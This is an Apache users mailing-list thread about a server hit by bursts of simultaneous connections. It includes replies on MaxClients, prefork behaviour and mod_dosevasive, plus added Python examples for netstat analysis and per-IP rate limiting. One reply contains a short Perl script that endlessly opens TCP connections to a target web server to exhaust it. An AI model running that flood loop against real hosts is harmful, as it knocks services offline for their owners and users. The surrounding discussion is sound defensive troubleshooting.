Posted to users@httpd.apache.org by Gil Disatnik <gi...@disatnik.com> on 2003/10/15 13:22:00 UTC

[users@httpd] Possible DDOS attack... ?

Hello there,

Every once in a while apache goes mad on one of my servers and spawns many new 
child processes in a very short period of time (< a minute).
I have started investigating the issue using a cronned script that records 
the system information only when under resource stress (ps, free, catting 
/proc/user_beancounters (this is a collocated server), netstat).
In addition I have changed apache's loglevel to debug in the hope of seeing more 
information (other than crying that it has to spawn many new children and not 
having enough spare servers, I did not get any useful information...)

I will get straight to business:
When the system gets too loaded with apache child processes, netstat shows this:

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
........ Irrelevant lines removed .........
tcp        0      0 61.112.113.115:80        213.132.85.114:1957     SYN_RECV
tcp        0      0 61.112.113.115:80        213.132.85.114:1928     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1933     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1935     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1934     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1945     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1944     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1947     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1946     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1949     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1948     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1951     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1950     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1937     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1936     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1939     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1938     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1941     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1940     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1943     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1942     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1961     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1960     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1963     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1962     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1965     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1964     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1967     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1966     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1953     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1952     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1955     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1954     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1956     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1959     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1958     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1969     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1968     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1971     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1970     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1973     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1972     ESTABLISHED
tcp        0      0 61.112.113.115:80        213.132.85.114:1974     ESTABLISHED
tcp        0      0 142.61.13.11:80        84.218.48.175:2013      ESTABLISHED
tcp        0      0 142.61.13.11:80        84.218.48.175:2015      ESTABLISHED
tcp        0      0 142.61.13.11:80        84.218.48.175:2024      ESTABLISHED
tcp        0      0 142.61.13.11:80        84.218.48.175:2020      ESTABLISHED
tcp        0      0 142.61.13.11:80        84.218.48.175:2021      ESTABLISHED
tcp        0      0 142.61.13.11:80        84.218.48.175:2022      ESTABLISHED
tcp        0      0 142.61.13.11:80        84.218.48.175:2023      ESTABLISHED
tcp        0      0 142.61.13.11:80        84.218.48.175:2019      ESTABLISHED

As you can see, a single IP is connecting to 61.112.113.115 and a different 
single IP is connecting to 142.61.13.11.
ps output shows that all servers were spawned in under a minute.

Does that seem like an attack? Should I start contacting the relevant ISPs? 
(IP addresses are different from one "attack" to another, however most of 
them belong to the same ISP.)
(IP addresses listed here are not the real ones.)
Thanks.



Regards

Gil Disatnik
UNIX system administrator.

GibsonLP@EFnet
http://gil.disatnik.com

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
apt-get install slackware
--------------------------------------------------------------------
"Windows NT has detected mouse movement, you MUST restart
your computer before the new settings will take effect, [ OK ]"
--------------------------------------------------------------------
Windows is a 32 bit patch to a 16 bit GUI based on a 8 bit operating
system, written for a 4 bit processor by a 2 bit company which can
not stand 1 bit of competition.
-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_- 


---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
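The check Gil's cron script could apply to the netstat snapshot above, added here as an example (it is not the poster's script): group sockets on the web port by remote host, so a burst can be told apart as one greedy client versus many sources. The netstat text is a constructed sample in the quoted format, and the threshold of 4 is an assumed tuning value taken from the thread's browser rule of thumb.

```python
"""Summarise a netstat snapshot by remote host for the web port."""
from collections import Counter

# Constructed sample in the format of the quoted netstat output (not real data):
# one remote host holding many concurrent connections, plus ordinary clients.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 61.112.113.115:80       213.132.85.114:1957     SYN_RECV
tcp        0      0 61.112.113.115:80       213.132.85.114:1928     ESTABLISHED
tcp        0      0 61.112.113.115:80       213.132.85.114:1933     ESTABLISHED
tcp        0      0 61.112.113.115:80       213.132.85.114:1935     ESTABLISHED
tcp        0      0 61.112.113.115:80       213.132.85.114:1934     ESTABLISHED
tcp        0      0 61.112.113.115:80       213.132.85.114:1945     ESTABLISHED
tcp        0      0 61.112.113.115:80       213.132.85.114:1944     ESTABLISHED
tcp        0      0 142.61.13.11:80         84.218.48.175:2013      ESTABLISHED
tcp        0      0 142.61.13.11:80         84.218.48.175:2015      ESTABLISHED
tcp        0      0 142.61.13.11:80         10.9.8.7:40001          ESTABLISHED
tcp        0      0 142.61.13.11:80         10.9.8.7:40002          TIME_WAIT
tcp        0      0 142.61.13.11:22         10.9.8.7:40003          ESTABLISHED
"""

# SYN_RECV counts as active: a half-open socket also ties up server-side state.
ACTIVE_STATES = ("SYN_RECV", "ESTABLISHED")


def parse_netstat(text, port=80):
    """Return (local_ip, remote_ip, state) for every non-listening socket
    on the given local port; lines that are not netstat rows are skipped."""
    rows = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] not in ("tcp", "tcp6"):
            continue
        local, remote, state = fields[3], fields[4], fields[5]
        if state == "LISTEN":
            continue
        local_ip, _, local_port = local.rpartition(":")
        remote_ip, _, _ = remote.rpartition(":")
        if local_port != str(port):
            continue
        rows.append((local_ip, remote_ip, state))
    return rows


def active_by_remote(rows, states=ACTIVE_STATES):
    """Count open or half-open sockets per remote IP."""
    return Counter(remote for _, remote, state in rows if state in states)


def suspicious_clients(text, port=80, threshold=4):
    """Remote IPs holding more than `threshold` active connections at once,
    busiest first. 4 is an assumed tuning value, not an Apache setting."""
    counts = active_by_remote(parse_netstat(text, port))
    return [(ip, n) for ip, n in counts.most_common() if n > threshold]


def burst_profile(text, port=80):
    """Is the load concentrated or distributed? Returns total active sockets,
    distinct sources and the busiest source's share (1.0 = one host owns all)."""
    counts = active_by_remote(parse_netstat(text, port))
    total = sum(counts.values())
    top = counts.most_common(1)[0][1] if counts else 0
    return {"total": total, "sources": len(counts),
            "top_share": round(top / total, 2) if total else 0.0}


if __name__ == "__main__":
    for ip, n in suspicious_clients(SAMPLE_NETSTAT):
        print(f"{ip} holds {n} concurrent connections to port 80")
    print(burst_profile(SAMPLE_NETSTAT))
```

A high `top_share` with few sources points at one misbehaving client (the situation in this thread) rather than a distributed attack.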


Re: [users@httpd] Possible DDOS attack... ?

Posted by Brian Dessent <br...@dessent.net>.
Gil Disatnik wrote:

> Access log shows the following on the client connecting:
> Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
> 
> however - it does show that it requests the many elements concurrently
> 
> Maybe it's a user who tweaked his IE to gain "extra speed"?

Could very well be.  There's a registry key that you can change that
sets this value.  I think it defaults to 2 for http/1.0 connections and
4 for http/1.1.  I am pretty sure I've seen more than one of these
"internet connection optimizer" programs that screw around with these
settings.

> concurrent gets, I simply wish to make sure apache will not spawn more than
> 4 children to attend to each client's requests, and in case a client tries to get
> more than 4, apache shall simply let his gets wait until previous gets
> have finished... Is there a way to do that?

I don't think that's possible.  Apache doesn't know anything about who
is making each request.  All it knows is that when a request comes in,
it has three options: hand it off to an idle worker, create an idle
worker if one doesn't exist and # < MaxClients, or let the request wait
in the listen queue until there is a free worker.  And I'm not sure
here, but once Apache calls accept() on a connection, there's no way to
undo that and "put it back in the queue."  So in other words, in order
to attempt to do what you want, Apache would have to first accept the
connection (so that it could determine who's on the other end) but once
it's done this it now has that connection in the open state, there's no
way to undo that and put it back in the queue.  I suppose it could let
the connection dangle and not hand it off to a worker, but I'm not sure
if that would scale very well -- it might make Apache more vulnerable to
a denial of service attack.  It's much safer if you don't accept() the
connection until you're ready to deal with it and let the TCP/IP stack
manage the queue.

Brian



Re: [users@httpd] Possible DDOS attack... ?

Posted by Gil Disatnik <gi...@disatnik.com>.
I think I understand, however Apache never got above that limit once 
I set it; I limited it only because when it spawned more than 110 or so 
children the system got too busy (not a very strong server, and it does 
other tasks as well...)

Access log shows the following on the client connecting:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

however, it does show that it requests the many elements concurrently.

Maybe it's a user who tweaked his IE to gain "extra speed"?

I have read a bit about mod_dosevasive; I am not sure how much that would 
help. I don't want to DENY access to users trying to have too many 
concurrent gets, I simply wish to make sure apache will not spawn more than 
4 children to attend to each client's requests, and in case a client tries to get 
more than 4, apache shall simply let his gets wait until previous gets 
have finished... Is there a way to do that?

Thanks.

At 08:19 PM 10/18/2003, you wrote:


Regards

Gil Disatnik
UNIX system administrator.





Re: [users@httpd] Possible DDOS attack... ?

Posted by Brian Dessent <br...@dessent.net>.
Gil Disatnik wrote:

> If I understand you right, a misconfigured client can result in spawning
> many apache children?
> I always thought that apache has 1 child per session regardless of the http
> connections the client is opening, and even if a user opens more of the
> same browser he uses, apache should still have a single child attending to
> this session.

I think you should drop the notion of a "session" as it just doesn't
exist.  Software can create it on top of http (i.e. php with cookies
and/or sessionID's) but at the http and Apache level there is no such
thing as a session.  Requests come in, and they're delegated to an idle
worker process -- that's all that Apache knows about.  Http is
completely stateless as they say.

However, there's one other aspect of TCP/IP that you're probably
referring to, and that's the "lingering".  Once the socket connection is
closed, the listening end lingers for some time period in case the
remote end re-establishes the connection...and the connection can be
setup again with less overhead than if everything had started over. So
in the case of a client making a number of sequential connections, they
should all be handled by the same worker process.

However, if the client on the other end spawns all these connections
simultaneously rather than serially, it will cause each one to be sent
to a different idle worker (and more workers will be created if the
number idle drops too low.)  I think most browsers are configured by
default to not initiate more than 4 simultaneous connections to any
given server, for this very reason.  Although if the client is running
some kind of misbehaved "website slurper" tool, or has changed the
settings in their browser it's certainly conceivable that they could
initiate many simultaneous connections, causing Apache to make more
workers.  I don't really see any way around this, as Apache's only way
of dealing with a burst of connections is to make enough workers to
handle them all, or let them wait in the listen queue if it's already at
MaxClients.

> So, what do you say? if it is indeed misconfigured clients, what can I do
> about it? more than 110 apache processes will choke the server, I find it a
> bit annoying that a single user going to a heavy page will spawn so many
> child processes...
> I have:
> MinSpareServers 10
> MaxSpareServers 20
> MaxClients 105

If you set MaxClients to 105 then you should never see more than 105
httpd processes running (plus the one additional controller process.) 
MaxClients is meant to limit the amount of resources that Apache can
take, so if it's going above that then there's definitely something
weird.  If this only happens infrequently then Apache should kill off a
bunch of the idle workers after the connections stop, so it shouldn't
have a lasting effect.

I'd say your first step would be to look at the User-Agent of these
requests, and if it's some oddball program just ban that program.  If it
really bothers you, look into mod_dosevasive, which keeps track of how
many connections a given IP address has made in some time window.  If
too many are made in too short a time, it causes Apache to place that IP
address on a temporary ban list, with an increasing back-off time if
they continue.

Brian
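A small model of the mechanism Brian describes, added here as an example (it is not mod_dosevasive's code): count hits per IP in a sliding window, block an IP that exceeds the limit for a while, extend the block while it keeps hitting, and double the block on each repeat offence. The limits (4 hits in 10 seconds, 60-second first block) and the doubling rule are assumed tuning choices, not the module's defaults; the event stream is constructed.

```python
"""Sliding-window per-IP limiter with a temporary, backing-off block."""
from collections import defaultdict, deque


class EvasiveLimiter:
    def __init__(self, max_hits=4, window=10, base_block=60):
        self.max_hits = max_hits         # hits tolerated inside one window
        self.window = window             # window length in seconds
        self.base_block = base_block     # first block length in seconds
        self.hits = defaultdict(deque)   # ip -> timestamps of recent hits
        self.blocked_until = {}          # ip -> time its block expires
        self.strikes = defaultdict(int)  # ip -> times it tripped the limit

    def block_length(self, ip):
        """Back-off: 60 s for the first offence, 120 s, 240 s ... after that."""
        return self.base_block * 2 ** (self.strikes[ip] - 1)

    def check(self, ip, now):
        """Decide 'allow' or 'block' for one hit from ip at time now (seconds)."""
        if self.blocked_until.get(ip, -1) > now:
            # Still blocked: every further hit pushes the expiry out again,
            # so a client that keeps hammering never gets out of the box.
            self.blocked_until[ip] = now + self.block_length(ip)
            return "block"
        recent = self.hits[ip]
        recent.append(now)
        while recent and recent[0] < now - self.window:   # drop old hits
            recent.popleft()
        if len(recent) > self.max_hits:
            self.strikes[ip] += 1
            self.blocked_until[ip] = now + self.block_length(ip)
            recent.clear()
            return "block"
        return "allow"


def run(events, limiter=None):
    """Apply the limiter to (ip, time) events in order; return the decisions."""
    if limiter is None:
        limiter = EvasiveLimiter()
    return [limiter.check(ip, t) for ip, t in events]


# Constructed event stream: host A bursts, keeps hitting while blocked, goes
# quiet, then bursts again; host B makes one ordinary request.
SAMPLE_EVENTS = [("A", 0), ("A", 1), ("A", 2), ("A", 3), ("A", 4), ("B", 4),
                 ("A", 5), ("A", 30), ("A", 100),
                 ("A", 200), ("A", 201), ("A", 202), ("A", 203), ("A", 204)]

if __name__ == "__main__":
    limiter = EvasiveLimiter()
    for (ip, t), decision in zip(SAMPLE_EVENTS, run(SAMPLE_EVENTS, limiter)):
        print(f"t={t:>3} {ip}: {decision}")
    print("blocked_until:", dict(limiter.blocked_until))
```

Note that, unlike what Gil asked for, this still denies the client rather than queuing it; the back-off is what keeps one greedy host from re-tripping the limit every window.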



Re: [users@httpd] Possible DDOS attack... ?

Posted by Robert Andersson <ro...@profundis.nu>.
Gil Disatnik wrote:
> If I understand you right, a misconfigured client can result in spawning
> many apache children?

At their discretion, and it might not even be a misconfiguration.

> I always thought that apache has 1 child per session regardless of the http
> connections the client is opening, and even if a user opens more of the
> same browser he uses, apache should still have a single child attending to
> this session.

No, Apache will have one child per connection/request. The HTTP standard
says that a client SHOULD NOT establish more than two simultaneous
connections to a host, but there is of course no guarantee that this is
appreciated. E.g., this cute little scriptie could seriously fuck up any
server:

#!/usr/bin/perl
# Socket.pm supplies PF_INET, SOCK_STREAM, sockaddr_in and inet_aton;
# without it the script does not run.
use Socket;
#####################################################################
for(my $i = 0; ; ++$i) {
    my $socksym = "sock$i";    # a fresh filehandle name per connection, never closed
    socket($socksym, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
    connect($socksym, sockaddr_in(80, inet_aton("your.doomed.host")));
}
#####################################################################
#####################################################################

Regards,
Robert Andersson




Re: [users@httpd] Possible DDOS attack... ?

Posted by Gil Disatnik <gi...@disatnik.com>.
You are right, my bad... I am using 1.3.28.
I have set MaxClients to 105 instead of the default because it used to kill 
my machine.

If I understand you right, a misconfigured client can result in spawning 
many apache children?
I always thought that apache has 1 child per session regardless of the http 
connections the client is opening, and even if a user opens more of the 
same browser he uses, apache should still have a single child attending to 
this session.

So, what do you say? If it is indeed misconfigured clients, what can I do 
about it? More than 110 apache processes will choke the server; I find it a 
bit annoying that a single user going to a heavy page will spawn so many 
child processes...
I have:
MinSpareServers 10
MaxSpareServers 20
MaxClients 105

Thanks.

At 07:42 PM 10/15/2003, you wrote:


Regards

Gil Disatnik
UNIX system administrator.





Re: [users@httpd] Possible DDOS attack... ?

Posted by Brian Dessent <br...@dessent.net>.
Gil Disatnik wrote:

> Actually - I do see a legitimate access on one of the virtual hosts access
> log files, however, I see only a single GET for one of the php files on
> the server and then the other gets for the objects referred to by the php
> output.
> Could it be that apache is spawning a child process for every GET directive
> even if it's the same session? could it be the user's client has a problem
> and uses different session numbers all the time?

Well, persistent connections/keep-alives are an optional thing.  A
client can open a new connection for every object that it retrieves, and
this is perfectly valid http behavior.  Some clients and/or proxy
servers just don't do persistent connections.

As far as Apache and spawning, you didn't mention whether this is 1.x or
2.x.  In 1.x, Apache uses the "prefork" method, which basically means
that it keeps a pool of workers, and if it sees that there are less than
some minimum number of free workers it will spawn more, up to the limit
of 'MaxClients'.  So, if you only have a few workers and a lot of
requests come in then Apache will spawn more, but it's not a 1:1 type of
thing where every request causes a spawn -- that would result in
terrible performance.

Brian



Re: [users@httpd] Possible DDOS attack... ?

Posted by kanarip <ka...@pczb.net>.
Maybe some person(s) just try to synchronize his local version of your
website, using dial up?

Or maybe someone mirrors your site?

Greets,

kanarip


----- Original Message -----
From: "Gil Disatnik" <gi...@disatnik.com>
To: <us...@httpd.apache.org>
Sent: Wednesday, October 15, 2003 7:22 PM
Subject: Re: [users@httpd] Possible DDOS attack... ?






Re: [users@httpd] Possible DDOS attack... ?

Posted by Gil Disatnik <gi...@disatnik.com>.
Thank you,

Actually, I do see a legitimate access on one of the virtual hosts' access 
log files; however, I see only a single GET for one of the php files on 
the server and then the other gets for the objects referred to by the php 
output.
Could it be that apache is spawning a child process for every GET directive 
even if it's the same session? Could it be the user's client has a problem 
and uses different session numbers all the time?

I will check out mod_dosevasive, thanks!

At 06:49 PM 10/15/2003, Brian Dessent wrote:


Regards

Gil Disatnik
UNIX system administrator.





Re: [users@httpd] Possible DDOS attack... ?

Posted by Brian Dessent <br...@dessent.net>.
Gil Disatnik wrote:

> As you can see, a single IP is connecting to 61.112.113.115 and a different
> single IP is connecting to 142.61.13.11
> ps output shows that all servers were spawned in under a minute.
> 
> Does that seem like an attack? should I start contacting the relevant ISPs?
> (IP addresses are different from one "attack" to another, however most of
> them belong to the same ISP).
> (IP addresses listed here are not the real ones)

Presumably there are accesslog entries for all these connections as
well?  If there are actual legitimate requests associated with these
then it could be a broken spider/robot/web cache or something that's
hammering the server trying to gulp down too much.  Or is it someone
just creating connections to take up resources and not actually do
anything?

In either case you may want to check out mod_dosevasive, which was
created for this very situation (limiting frequent connects from the
same remote host.)

Brian
